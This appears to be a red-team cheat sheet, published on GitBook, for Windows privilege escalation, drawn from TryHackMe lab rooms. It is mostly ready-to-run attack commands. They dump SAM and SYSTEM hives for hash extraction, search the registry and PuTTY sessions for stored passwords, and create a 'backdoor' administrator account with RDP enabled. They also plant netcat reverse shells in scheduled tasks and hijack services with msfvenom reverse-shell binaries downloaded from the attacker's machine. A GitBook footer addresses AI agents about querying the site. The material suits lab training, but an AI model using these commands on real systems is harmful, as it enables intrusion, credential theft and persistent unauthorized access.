> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/methodologies-and-resources/cheat-sheets/privilege-escalation/windows.md).
# Windows
**Copy info from here:** [**https://tryhackme.com/room/windowsprivesc20**](https://tryhackme.com/room/windowsprivesc20)
## **Gathering Info**
```
whoami /priv
```
```
net user
```
```
systeminfo
```
```
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
```
```
dir c:\
```
```
dir "c:\program files"
```
```
dir "c:\program files (x86)"
```
```
wmic service get name,startname
```
```
wmic service get name,pathname,startname | findstr "Program Files"
```
Find text in file
```
type C:\Windows\path\to\file\$FILE | findstr $STRING
```
Find passwords
```
reg query HKLM /f password /t REG_SZ /s
```
###
### **Whoami /priv**
| Finding | Comment | Examples |
| ---------------------- | ------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------- |
| SeImpersonatePrivilege | Printspoofer - works on Windows 10 and Server 2016/2019 | [Relevant](/red-team/walkthroughs/tryhackme/relevant.md)[Stealth](/red-team/walkthroughs/tryhackme/stealth.md) |
| SeImpersonatePrivilege | Using EfsPotato | [Stealth](/red-team/walkthroughs/tryhackme/stealth.md) |
| | | |
## Harvesting Passwords from Usual Spots
Might be able to find interesting files by looking at what was recently accessed. Start -> run -> recent.
### **Powershell history**
**Examples**
[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#harvesting-passwords-from-usual-spots)
**Victim(cmd)**
```
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```
**Examples**
[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#harvesting-passwords-from-usual-spots)
Need GUI to see other command prompt that will be spawned
**Victim(cmd)**
```
cmdkey /list
runas /savecred /user:$DOMAIN\$USERNAME cmd.exe
```
**Examples**
[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#harvesting-passwords-from-usual-spots)
Retrieve the saved password stored in the saved PuTTY session under your profile.
**Victim(cmd)**
```
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
```
### See hidden files
**Examples**
[Anthem](/red-team/walkthroughs/tryhackme/anthem.md)
### System and Sam
#### Download system and sam
**Examples**
[Windows Local Persistence](/red-team/walkthroughs/tryhackme/windows-local-persistence.md#tampering-with-unprivileged-accounts)
**Kali(WinRM)**
```
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
```
#### Dump hashes
**Examples**
[Windows Local Persistence](/red-team/walkthroughs/tryhackme/windows-local-persistence.md#tampering-with-unprivileged-accounts)
**Kali**
```
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
```
## Add User & Assign Group Memberships
**Victim**
```
net user backdoor pass!123 /add
net localgroup Administrators backdoor /add
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f
```
### **Enable RDP**
**Victim**
```
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
```
### Add user to RDP Group
**Examples**
[Windows Local Persistence](/red-team/walkthroughs/tryhackme/windows-local-persistence.md#assign-group-memberships)
Add user to group that allows them to RDP
**Victim(cmd)**
```
net localgroup "Remote Management Users" $USER /add
```
## Scheduled Tasks
**Examples**
[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md)[Windows Local Persistence](/red-team/walkthroughs/tryhackme/windows-local-persistence.md#abusing-scheduled-tasks)
Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it's using a binary you can modify.
Scheduled tasks can be listed from the command line using the schtasks command without any options. To retrieve detailed information about any of the services, you can use a command like the following one:
**Victim(cmd)**
```
schtasks
```
**Victim(cmd)**
```
schtasks /query /tn $TASK /fo list /v
```
**Victim(cmd)**
```
icacls c:\tasks\schtask.bat
```
**Kali**
```
nc -lvnp 4444
```
**Victim**
```
echo c:\tools\nc64.exe -e cmd.exe $KALI 4444 > C:\tasks\schtask.bat
schtasks /run /tn $TASK
```
## Abusing Service Misconfigurations
**Examples**
[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#abusing-service-misconfigurations)
### Insecure Permissions on Service Executable
**Get the flag on svcusr1's desktop**
**Victim(cmd)**
```
sc qc WindowsScheduler
```
**Victim(cmd)**
```
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
```
**Kali**
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4445 -f exe-service -o rev-svc.exe
python2 -m SimpleHTTPServer 81
```
**Victim(Powershell)**
```
wget http://$KALI:81/rev-svc.exe -O rev-svc.exe
```
Once the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the Everyone group as well.
**Victim(Powershell)**
```
cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F
```
**Kali**
```
nc -lvp 4445
```
**Note:** PowerShell has sc as an alias to Set-Content, therefore you need to use sc.exe in order to control services with PowerShell this way.
As a result, you'll get a reverse shell with svcusr1 privileges:
**Victim(cmd)**
```
sc stop windowsscheduler
sc start windowsscheduler
```
**OR**
**Victim(Powershell)**
```
sc.exe stop windowsscheduler
sc.exe start windowsscheduler
```
### Unquoted Service Paths
**Examples**
[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#unquoted-service-paths)
**Victim(cmd)**
```
sc qc "disk sorter enterprise"
```
**Kali**
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4446 -f exe-service -o rev-svc2.exe
python2 -m SimpleHTTPServer 81
```
**Victim(Powershell)**
```
wget http://10.10.15.215:81/rev-svc2.exe -O rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
```
**Kali**
```
nc -lvp 4446
```
**Victim(cmd)**
```
sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise"
```
### Insecure Service Permissions
**Examples**
[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#insecure-service-permissions)
**Victim(cmd)**
```
cd C:\tools\AccessChk
accesschk64.exe -qlc thmservice
```
**Kali**
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4447 -f exe-service -o rev-svc3.exe
python2 -m SimpleHTTPServer 81
```
**Victim(Powershell)**
```
wget http://10.10.15.215:81/rev-svc3.exe -O rev-svc3.exe
```
**Kali**
```
nc -lvp 4447
```
**Victim(Powershell)**
```
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
sc.exe config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc.exe stop THMService
sc.exe start THMService
```
## Abusing dangerous privileges
**Examples**
[Windows Privilege Escalation](/red-team/walkthroughs/tryhackme/windows-privilege-escalation.md#abusing-dangerous-privileges)
**Kali**
```
nc -lvp 4442
```
**Victim(Browser)**
```
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.10.22.165 4442"
```
## Bypassing UAC
**Examples:**
[Bypassing UAC](/red-team/walkthroughs/tryhackme/bypassing-uac.md)
## Bypassing Applocker
**Examples:**
[Corp](/red-team/walkthroughs/tryhackme/corp.md#bypassing-applocker)
Load PowerUp.ps1 into memory.
**Kali**
```
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 81
```
Add the following line at the bottom to PowerUp.ps1 so it Invokes all checks automatically once downloaded
**PowerUp.ps1**
```
Invoke-AllChecks
```
**Victim(powershell)**
## Windows Exploit Suggester
**Examples**
[HackPark](/red-team/walkthroughs/tryhackme/hackpark.md)
**Setup**
Run command then paste output back to Kali in a file called systeminfo.txt
**Victim**
```
systeminfo
```
**Kali**
```
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester/
python3.9 windows-exploit-suggester.py --update
python3.9 windows-exploit-suggester2.py --database 2022-12-03-mssb.xls --systeminfo systeminfo.txt
```
## **WinPeas**
**Examples**
[HackPark](/red-team/walkthroughs/tryhackme/hackpark.md)
**Setup**
**Kali**
```
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221127/winPEASx64.exe
python2 -m SimpleHTTPServer 82
```
**Victim**
```
cd C:\Windows\Temp
powershell "(New-Object System.Net.WebClient).Downloadfile('http://$KALI:82/winPEASx64.exe','winPEASx64.exe')"
winPEASx64.exe
```
## SharpHound
**Examples**
[Post-Exploitation Basics](/red-team/walkthroughs/tryhackme/post-exploitation-basics.md)
Add this line to SharpHound.ps1 before transferring so I could run the command right away
**Victim**
```
powershell -ep bypass
.\SharpHound.ps1
```
**Kali**
```
apt-get install bloodhound
neo4j console
bloodhound --no-sandbox
```
### Find all Domain Admins
### List all Kerberostable accounts
## Powerview
**Examples**
[Post-Exploitation Basics](/red-team/walkthroughs/tryhackme/post-exploitation-basics.md)
**Victim**
Run below to be able to run PowerView commands.
```
powershell -ep bypass
. .\Downloads\PowerView.ps1
```
Enumerate the domain users.
```
Get-NetUser | select cn
```
Enumerate the domain groups.
```
Get-NetGroup -GroupName *admin*
```
Find Shared folders.
```
Invoke-ShareFinder
```
Get Operating systems on the network.
```
Get-NetComputer -fulldata | select operatingsystem
```
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://jeffgthompsons-organization.gitbook.io/red-team/methodologies-and-resources/cheat-sheets/privilege-escalation/windows.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.